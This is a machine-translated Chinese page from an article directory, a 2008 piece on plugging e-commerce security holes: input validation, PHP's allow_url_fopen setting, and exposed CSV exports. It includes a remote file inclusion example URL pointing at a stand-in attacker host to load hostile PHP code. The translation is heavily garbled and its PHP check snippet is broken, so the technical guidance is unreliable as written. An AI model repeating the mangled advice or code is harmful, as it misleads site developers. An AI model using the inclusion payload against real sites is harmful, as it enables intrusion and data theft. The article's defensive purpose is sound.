The following content has been automatically translated by close 
電子商務安全-堵塞安全漏洞|阿電子商務文章
第球形徽標

電子商務安全-堵塞安全漏洞

由專家作者: 保羅羅伯茨 | 文章摘要
字數:520字|點擊:160期(縣)
安全電子商務網站必須有一個重要的考慮因素在發展電子商務的網站或軟件。開發人員需要知道的所有的安全考慮,在設計網站。隨著電子商務的日益普及,這些天,安全攻擊數量肯定增加。偏執狂是健康的電子商務網站開發人員,我們必須跟上大門與安全問題,並保持我們的耳朵和眼睛打開。雖然以下漏洞嚴重的,如果存在以下漏洞很容易修復。

下面列出了一些安全方面的考慮應包括在開發一個網站。本文不包括電子買,請參閱我在這條分開。

用戶輸入-每個輸入,無論是進入了一個數量,產品搜索,輸入一個名稱等,需要得到確認可疑人物。如果不這樣做,它有可能進入"?>",閉幕結束標記的PHP和執行一些PHP代碼。

這是更加安全,讓數字和字符宰(包括資金)和0-9,沒有別的,而不是使所有的列表的字符不應該存在。驗證腳本需要每個字符滾動逐一。這需要取得使用服務器端驗證,與JavaScript。使用服務器端的輸入驗證是必需的不需要的字符

另一個主要存在在執行PHP代碼。當使用PHP有一個叫做allow_url_fopen選項設置使開放的文件從一個PHP腳本。此設置應關閉,除非絕對必要的。

試想你的PHP腳本為固定頁眉和頁腳,並訪問您的網頁您可以鍵入在http://www.mysite.com/index.php?page=page2。它採取的所有是一個惡意用戶運行一個腳本通過修改這些參數中鍵入的“http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt”與一些PHP代碼文件中的“hacker.txt”。你可以有任何事情發生,PHP文件閱讀,刪除,重要信息被盜。

如果您不知道此設置或關閉,請複製下面的PHP代碼到一個文本文件,並將其上傳到您的Web服務器:

phpinfo()函數;
?“

當您訪問您的網絡服務器上的腳本,你應該遇到設立allow_url_fopen選項下的配置。

計算機用戶,一般情況下無法找到此設定值。

小心數據如出口訂單,產品在CSV和MySQL文件。如果這些數據是從腳本導出並保存在Web服務器上在一個共同文件的名稱,即。 http://www.mysite.com/admin/output_tables.csv。這僅僅是一個真正的問題時,導出的數據駐留在一個文件中的目錄中向公眾開放。有兩種方法來防止這種安全漏洞-首先輸出文件背後的密碼保護的目錄,其次有數據位於內的HTML textarea的表單元素上的腳本。該店主可以複製此信息的文本文件,並創建一個新文件在他們的計算機和信息粘貼在這裡。

只需要一黑客找到這個文件,通過檢出電子商務軟件的演示網站,尋找相同的文件名上真正的網站。
保羅羅伯茨

關於作者/作者自述

保羅羅伯茨
我開了一家軟件開發公司,專門從事電子商務,搜索引擎優化,軟件和打印估計所謂的機器人設計解決方案。我還制定新西蘭電子商務解決方案和軟件的名義機器人設計。

Article Source: http://www.zh-tw.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05 | This Article has been viewed 160 times.

Rate Article

Related Videos

How to Strengthen Network Security with Cisco Network Manager
Understanding your Home Network Router #5 - Secure Your Network with WPA2
如何讓您的電腦安全
如何檢查安全設置在Windows Vista

更多“電子商務”相關文章

下面列出了更多的文章與上述文章的“電子商務”類物品。

人們感興趣的上述文章“電子商務安全-堵塞安全漏洞”也有興趣在有關條款如下:

運行電子商務業務不僅可以確保您的網站建立和運行。客戶依賴你的能力,為他們通過電話,傳真,電子郵件或其他手段,它要求所有的系統必須努力能夠完成客戶的要求。
就在過去幾天回來,我有一個朋友聊天。他是慶祝他的孩子的第一生日,並以他的祖國之間運行,在喀拉拉邦和欽奈,他的工作地點。他和他的賢內助前往這些地方之間的至少4次在最後一個月。
如果你一直在做電子商務的任何金額的時候,你就會知道有更多scamers比真正的批發運輸船提供目錄服務。在世界電子商務,Salehoo和全球品牌是信譽的服務供應商都已經得到普及,在過去幾年。
如果你曾經一直是在線零售商,你可能已經聽說過Salehoo,甚至用它來你的優勢。如果你剛開始與您的業務,您可能會混淆混合Salehoo審查那裡。現在,讓我們來看一看Salehoo的真正意義,以及它們提供的服務,很多往往忽略。
有多少人,你知道網上購買東西?如果你像我一樣不少,這就是為什麼電子商務是世界上新的網上購物商場。但是,誰運行這些網上零售商店?人象您和我,這就是為什麼這一業務正在蓬勃發展,將繼續繁榮,以及現在和未來。
如果你是一個巨大的風扇的最新電子產品,你可能被誘惑的思想,經營自己的電子網上業務。這並不困難,開始時,採取充分利用權下降航運電子服務,也有很多供您選擇。
你有沒有進入當地的便利店,不知道會是這樣,如果你擁有它?你會是一個很好的主人,人民喜歡你?那麼這篇文章將顯示您的好處擁有自己的網上零售商店, 或俗稱的電子商務有別於真正的本地便利店。
文章目錄主頁 所有類別 互聯網和電子商務 電子商務

找不到您要的資料嗎?試用谷歌搜索!
版權所有© 2005 - 由Larry林,新加坡-文章搜索引擎目錄上ArticleSphere.com™
全球版權所有。所有商標和服務標誌是財產各自的所有者。

南非荷蘭文 阿爾巴尼亞文 阿拉伯語 白俄羅斯文 保加利亞文 加泰羅尼亞文 中文(簡體) 中文(繁體) 克羅地亞文 捷克文 丹麥文 德語 英語 愛沙尼亞文 菲律賓文 芬蘭文 法語 加利西亞文 希臘語 希伯來語 印地文 匈牙利文 冰島文 印度尼西亞文 愛爾蘭文 意大利語 日語 韓文 拉脫維亞文 立陶宛文 馬其頓文 馬來文 馬耳他文 荷蘭文 挪威文 波斯文 波蘭文 葡萄牙語 羅馬尼亞文 俄文 塞爾維亞文 斯洛伐克文 斯洛文尼亞文 西班牙語 斯瓦希裡文 瑞典文 泰國 土耳其文 烏克蘭文 越南文 威爾士文 依地文